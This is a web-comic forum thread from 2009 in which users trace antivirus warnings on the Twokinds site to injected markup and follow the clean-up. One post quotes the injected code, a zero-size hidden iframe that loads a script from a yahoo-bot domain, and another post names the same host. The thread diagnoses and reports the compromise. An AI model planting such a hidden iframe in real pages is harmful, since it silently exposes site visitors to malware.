Virus on 2kinds homepage?

For tech wizards and n00bs alike. Questions, answers, or just general hoo-haa.

Moderator: Moderators

Message
Author
User avatar
O'reely
New Citizen
Posts: 44
Joined: Mon Jan 26, 2009 9:01 am
Location: BC, Canada

Virus on 2kinds homepage?

#1 Post by O'reely »

First time I've ever seen this, when going to the 2kinds home page (not the forums) my antivirus program pops up with this:

Image

This is the first time I've ever seen this. I doubt it's an *actual* virus, but I'd like to know what it is anyways.

*edited for bigger and less crappy picture*

FastChapter
The Inkwell Coyote
Posts: 9458
Joined: Wed Aug 09, 2006 9:28 pm

Re: Virus on 2kinds homepage?

#2 Post by FastChapter »

Looks like this problem is pinging a lot of people's virus scans, which suggests it isn't a fluke. Thanks for the screenshot, this was more than my Avast offered me.

I did some digging and found a forum thread about the script in question: http://forum.avast.com/index.php?topic=43676.0
Your site has been hacked there is a hidden iFrame tag inserted just after the opening Body tag

See image of the code, I have broken it down to make it easier to view (it was on a single line).

Note: there is a couple of <script> tags inserted after the closing html tag and a <noscript> tag, a standards, no, no. These however aren't what avast is alerting on but the hidden iframe.
</body>
</html>
<!-- text below generated by server. PLEASE REMOVE --><!-- Counter/Statistics data collection code --><script language="JavaScript" src="http://us.js2.yimg.com/us.js.yimg.com/l ... pt><script language="javascript">geovisit();</script><noscript><img src="http://visit.webhosting.yahoo.com/visit ... 1238001167" alt="setstats" border="0" width="1" height="1"></noscript>
So my best guess is the front page of the website has been hacked. Since Nanaki isn't around to help, best bet is to get into contact with Tom. He needs to check the site scripts and make sure someone looks at it.

EDIT: I got a hold of Tom, he reset the scripts and it looks like the bugaboo is gone. He thinks a bot probably inserted it rather than any particular person, which sounds more plausible than some random guy in Portugal haxxoring to the maxxors. Ah well, I'm hardware, he's software, XD

PROBLEM FEEXED.

User avatar
Lithas
Templar
Posts: 373
Joined: Sat Mar 21, 2009 6:31 pm
Location: Da UP 'eh?

Re: Virus on 2kinds homepage?

#3 Post by Lithas »

Are you sure we can't blame Phoenix Requiem for this? I mean, we /did/ just eight rankings in a matter of hours. They're probably terrified.

In all seriousness though, great save!
[Working on making myself a siggy...]

Ask not what your country can do for you. It's broke too.

User avatar
Tor
Traveler
Posts: 26
Joined: Mon May 25, 2009 9:45 am

Re: Virus on 2kinds homepage?

#4 Post by Tor »

I seem to be getting it in the archive pages.
Image
Image
Look, a bad signature!

RobbieThe1st
Templar GrandMaster
Posts: 706
Joined: Fri Dec 08, 2006 7:06 am
Location: Behind my computer.
Contact:

Re: Virus on 2kinds homepage? Edit: Fixed now

#5 Post by RobbieThe1st »

Nope, this is all just a fluke. I took a look at the code in the JS file above - perfectly safe.
The snippet of code is simply a Yahoo hit-counter. Nothing to be worried about.

edit:
However, as aj brought up to me on IRC, the code in the archives is different. I just took a look at that, and while I didn't follow the code through a bunch of redirects, I am positive it is up to no good.

-RobbieThe1st

Infectus
Newbie
Posts: 2
Joined: Mon Jun 15, 2009 2:47 pm

Re: Virus on 2kinds homepage? Edit: Fixed now

#6 Post by Infectus »

I got a message different from the one on this thread:

Image

Shortly afterward, Avast's services shut down, this could just be a coincidence, but still I want to know what's going on.

User avatar
aj
Consistently Inconsistent
Posts: 1725
Joined: Wed Jul 30, 2008 10:13 am

Re: Virus on 2kinds homepage? Edit: Fixed now

#7 Post by aj »

Just like that annoying foot fungus that keep reappearing no matter what you do, it's bbbbaaaaaaaaaaaaaaacccccccccccckkkkkkkkkkkkkkkk.

Main page:
Image
Archive listing page:
Image

Yep, something is there alright.

Those of you with Firefox, grab the NoScript extension here. Seems to suppress it. Also, Google seems to have picked it up and appears to be blocking it (if you've left the "Tell me if the site I'm visiting is an attack site" option enabled in Firefox, that is.)

People don't venture into the Tech Board as often as they do the FAQ Board, so cross-posted there for confirmation. (If I am in violation of a rule, please tell me mods? Also, someone may want to change the title of this topic. :| )
---
Edit: adding information posted in the FAQ board - on second thought, maybe not such a good idea to post in multiple places. >.>
Ok, a bunch of pages are infected:
The archive listing - twokindscomic.com/archive.html
The archives themselves - twokindscomic.com/index.php
Main page - 2kinds.com
Characters page - 2kinds.com/characters.htm
News page - 2kinds.com/news_v2.htm
"Today's" comic page - 2kinds.com/todayscomic.htm

In each case, it's iframes pointing to yahoo-bot.org/in.cgi?4 .
Anyone see any other pages?

(Check to make sure that you're opening them in their own tab - not loading on the main page, because that'll be a false positive. The main page itself is infected, and clicking the link without opening a new tab just loads it in a frame on the main page.)

As to why people are getting multiple warning about the front page - it's actually made up of 3 pages. The main page itself, today's comic page and the news page. Each of those 3 are infected. Hence, 3 warnings.

Yes, this is another infection people. (;_;)
avwolf wrote:"No dating dog-girls, young man, your father is terribly allergic!"
y̸̶o͏͏ų̕ sh̡o̸̵u̶̕l̴d̵̡n̵͠'̵́͠t͜͢ ̀͜͝h̶̡àv̸e͡ ̛d̷̨͡o͏̀ne ̶͠͡t҉́h̕a̧͞t̨҉́.̵̧͞.͠͞.͟

Harb
Grand Templar
Posts: 2256
Joined: Wed Jan 21, 2009 12:00 pm

Re: Virus on 2kinds homepage? Edit: Fixed now

#8 Post by Harb »

my antivir still reports a trojan (in three different files) on the main and one on the archive pages. there must have been a second infection after the reset.
[under construction]

User avatar
aj
Consistently Inconsistent
Posts: 1725
Joined: Wed Jul 30, 2008 10:13 am

Re: Virus on 2kinds homepage? Edit: Fixed now

#9 Post by aj »

Virus is cleared up now. :grin:
avwolf wrote:"No dating dog-girls, young man, your father is terribly allergic!"
y̸̶o͏͏ų̕ sh̡o̸̵u̶̕l̴d̵̡n̵͠'̵́͠t͜͢ ̀͜͝h̶̡àv̸e͡ ̛d̷̨͡o͏̀ne ̶͠͡t҉́h̕a̧͞t̨҉́.̵̧͞.͠͞.͟

FastChapter
The Inkwell Coyote
Posts: 9458
Joined: Wed Aug 09, 2006 9:28 pm

Re: Virus on 2kinds homepage? Edit: Fixed now

#10 Post by FastChapter »

aj wrote:Virus is cleared up now. :grin:
To prevent future trojans from infecting your servers, please be sure to use proper protection.

User avatar
aj
Consistently Inconsistent
Posts: 1725
Joined: Wed Jul 30, 2008 10:13 am

Re: Virus on 2kinds homepage? Edit: Fixed now

#11 Post by aj »

FastChapter wrote:
aj wrote:Virus is cleared up now. :grin:
To prevent future trojans from infecting your servers, please be sure to use proper protection.
Well... I was thinking more along the lines of this type of protection, but whatever works. Image

Seriously though, I'm guessing it's server-side, which means it may happen again, and we can't do anything about it. (Sage says he's experienced repeated hacks on the same webhost too. :? )
avwolf wrote:"No dating dog-girls, young man, your father is terribly allergic!"
y̸̶o͏͏ų̕ sh̡o̸̵u̶̕l̴d̵̡n̵͠'̵́͠t͜͢ ̀͜͝h̶̡àv̸e͡ ̛d̷̨͡o͏̀ne ̶͠͡t҉́h̕a̧͞t̨҉́.̵̧͞.͠͞.͟

User avatar
Lief
No hugs, I asplode.
Posts: 3871
Joined: Wed May 06, 2009 5:37 am
Location: Somewhere, I'm sure.
Fav. Twokinds Character: Raine

Re: Virus on 2kinds homepage? Edit: Fixed now

#12 Post by Lief »

Its back...in the news section (I only know because I told my antivir to deny access and the news section wouldn't load afterwards) I don't have a screenshot or anything like that unfortunately, I hadn't thought to get one at the time :roll:

EDIT: It be fixed for now...as far as I can tell anyways :?

User avatar
aj
Consistently Inconsistent
Posts: 1725
Joined: Wed Jul 30, 2008 10:13 am

Re: Virus on 2kinds homepage? Edit: Fixed now

#13 Post by aj »

Mmm.... can't see anything myself. Maybe it was a cached copy or something? :|
avwolf wrote:"No dating dog-girls, young man, your father is terribly allergic!"
y̸̶o͏͏ų̕ sh̡o̸̵u̶̕l̴d̵̡n̵͠'̵́͠t͜͢ ̀͜͝h̶̡àv̸e͡ ̛d̷̨͡o͏̀ne ̶͠͡t҉́h̕a̧͞t̨҉́.̵̧͞.͠͞.͟

User avatar
Lief
No hugs, I asplode.
Posts: 3871
Joined: Wed May 06, 2009 5:37 am
Location: Somewhere, I'm sure.
Fav. Twokinds Character: Raine

Re: Virus on 2kinds homepage? Edit: Fixed now

#14 Post by Lief »

Who knows, I checked about an hour later and the news section was loading fine, meaning my antivir unblocked/whatever'd it XD thats around when I edited my post up thar

ChaoticOrder
Newbie
Posts: 3
Joined: Thu Apr 30, 2009 11:51 pm

Re: Virus on 2kinds homepage? Edit: Fixed now

#15 Post by ChaoticOrder »

Uh oh, it's back.

Sorry in advance for the big post; the pictures are big.

Upon visiting, I get the Google Warning:
image at http://i42.tinypic.com/11wg088.png
Then, when I click the I understand, Proceed Anyway thing, I get another Google Warning:
image at http://i40.tinypic.com/15oyvrb.png
(avast! also claimed it was a Trojan on the visit and aborted, but it isn't anymore for some reason...)

So naturally, I visited the diagnostics page:
image at http://i43.tinypic.com/ibvot3.png[/img]
To be honest, it didn't seem that bad. But it seems to be affiliated with yahoo-bot.org:
image at http://i44.tinypic.com/2hznw2p.png[/img]



Anyways, it's all caused by this little line in the page source:

</head>

<body><iframe src="http://yahoo-bot.net/in.cgi?2" width="0" height="0" frameborder="0"></iframe>
<table border="0" cellspacing="0" cellpadding="0"


I'm assuming the front page was hijacked...?

Edit: Fixed

Post Reply